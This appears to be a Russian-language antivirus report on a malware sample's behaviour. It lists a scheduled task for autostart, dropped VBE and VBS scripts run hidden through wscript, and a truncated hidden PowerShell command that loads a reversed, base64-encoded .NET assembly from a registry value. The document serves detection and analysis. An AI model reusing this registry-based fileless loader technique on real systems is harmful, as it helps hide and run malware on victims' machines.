Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\feluhdocvexkmxf
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\myfile.vbe
- %APPDATA%\feluhdocvexkmxf.vbs
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\MyFile.vbe"
- '<SYSTEM32>\wscript.exe' "%APPDATA%\fELuhdoCVExKMxF.VBS"
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $r='HKCU:\Software\fELuhdoCVExKMxF';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($... (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {88A117C4-C8E8-47E8-AAF9-388FD99A6C3F} S-1-5-21-3691498038-2086406363-2140527554-1000:arnejlje\user:Interactive:[1]
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\MyFile.vbe" (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\fELuhdoCVExKMxF.VBS" (со скрытым окном)
